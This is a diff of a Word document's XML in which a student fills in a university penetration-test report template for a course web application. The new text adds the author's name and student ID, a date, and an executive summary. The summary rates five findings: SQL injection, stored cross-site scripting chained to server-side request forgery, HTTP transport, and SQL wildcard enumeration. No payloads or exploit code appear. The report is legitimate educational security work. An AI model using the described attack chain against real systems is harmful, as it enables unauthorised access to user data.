--- a/Assignment 2 Pentest Report.docx
+++ b/Assignment 2 Pentest Report.docx
@@ -27,12 +27,19 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Student Full Name</w:t>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>Xi</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ande Wen</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Student ID Number</w:t>
+        <w:t>905003</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -225,14 +232,46 @@
           <w:sz w:val="48"/>
           <w:szCs w:val="48"/>
         </w:rPr>
-        <w:t>Report delivered: dd/mm/2021</w:t>
+        <w:t xml:space="preserve">Report delivered: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+        </w:rPr>
+        <w:t>06</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+        </w:rPr>
+        <w:t>05</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+        </w:rPr>
+        <w:t>/2021</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc69927386"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc71299205"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Executive Summary</w:t>
@@ -241,7 +280,583 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Executive summary of findings and your assessment of the security posture of the web application. One page maximum.</w:t>
+        <w:t xml:space="preserve">We Test Pans Incorporated has carried out an exhaustive penetration test of the web application </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId8" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>http://assignment-hermes.unimelb.life</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> at the request of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>PleaseHold</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Pty. Ltd.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">t the conclusion of the test, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>five</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> vulnerabilities (and their associated risks) have been uncovered:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>QL injection;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>ross-site scripting;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>erver-side request forgery;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>ending sensitive information over HTTP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>QL wildcard attack;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">hese risks range in severity from high to low, with the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>most concern falling on the SQL injection vulnerability in the finding user functionality</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (Finding 1)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">This vulnerability </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>allows a user to brute-force all other users’ login credentials, resulting in the ability to perform unauthorised actions and leak personally identifiable information.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>Another high-risk</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> vulnerability is the stored cross-site scripting in the web application’s anonymous question functionality (Finding 2). This vulnerability allows users to inject a piece of code to the database, which will perform unauthorised actions when triggered. As a result of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>such</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">users </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>will</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> be able to leak out the server file content which </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>can</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> be feeding to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">another high-risk </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">vulnerability – </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>the</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">server-side request forgery can be </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>made through the website validation API (Finding 3) based on the information gained from cross-site scripting</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to access sensitive background checks information</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>Next, the use of HTTP protocol</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> presents medium risk</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to the web applicatio</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (Finding 4)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>. The last vulnerability, the SQL wildcard attack through the</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>trainings</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> API (Finding 5)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> can</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>list out all the</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> trainings in the store</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>. I</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> this case, it is considered to be low-risk since no sensitive information involved</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>Proper mitigations are still recommended</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> if </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">it </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>is not an intended usage</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Based on these findings, the website is not secure enough for production. The high-risk vulnerabilities can cause severe data </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>brea</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ch </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>and serious damage to the business reputation and they have to be mitigated before release.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The low-risk vulnerability, SQL wildcard attack, can be fixed along with the SQL injection. The medium-risk vulnerability, depending on the deadline and budgetary constraints, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>can be mitigated optionally with proper warnings displayed.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -291,7 +906,11 @@
               <w:tab w:val="right" w:pos="9019"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
           <w:r>
@@ -303,7 +922,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc69927386" w:history="1">
+          <w:hyperlink w:anchor="_Toc71299205" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -330,7 +949,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69927386 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299205 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -368,10 +987,14 @@
               <w:tab w:val="right" w:pos="9019"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69927387" w:history="1">
+          <w:hyperlink w:anchor="_Toc71299206" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -398,7 +1021,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69927387 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299206 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -418,7 +1041,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>4</w:t>
+              <w:t>5</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -436,10 +1059,14 @@
               <w:tab w:val="right" w:pos="9019"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69927388" w:history="1">
+          <w:hyperlink w:anchor="_Toc71299207" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -466,7 +1093,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69927388 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299207 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -486,7 +1113,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -504,16 +1131,28 @@
               <w:tab w:val="right" w:pos="9019"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69927389" w:history="1">
+          <w:hyperlink w:anchor="_Toc71299208" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>Finding 1 - Brief description in title</w:t>
+              <w:t xml:space="preserve">Finding 1 - SQL </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>injection vulnerability present in finding user functionality</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -534,7 +1173,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69927389 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299208 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -554,7 +1193,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -572,10 +1211,14 @@
               <w:tab w:val="right" w:pos="9019"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69927390" w:history="1">
+          <w:hyperlink w:anchor="_Toc71299209" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -603,7 +1246,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69927390 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299209 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -623,7 +1266,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -641,10 +1284,14 @@
               <w:tab w:val="right" w:pos="9019"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69927391" w:history="1">
+          <w:hyperlink w:anchor="_Toc71299210" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -672,7 +1319,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69927391 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299210 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -692,7 +1339,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -710,10 +1357,14 @@
               <w:tab w:val="right" w:pos="9019"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69927392" w:history="1">
+          <w:hyperlink w:anchor="_Toc71299211" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -741,7 +1392,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69927392 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299211 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -761,7 +1412,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -779,10 +1430,14 @@
               <w:tab w:val="right" w:pos="9019"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69927393" w:history="1">
+          <w:hyperlink w:anchor="_Toc71299212" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -810,7 +1465,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69927393 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299212 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -830,7 +1485,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -848,10 +1503,14 @@
               <w:tab w:val="right" w:pos="9019"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69927394" w:history="1">
+          <w:hyperlink w:anchor="_Toc71299213" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -879,7 +1538,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69927394 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299213 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -899,7 +1558,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -917,10 +1576,14 @@
               <w:tab w:val="right" w:pos="9019"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="21"/>
+              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69927395" w:history="1">
+          <w:hyperlink w:anchor="_Toc71299214" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -948,7 +1611,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69927395 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71299214 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -968,7 +1631,7 @@
                 <w:noProof/>
                 <w:webHidden/>
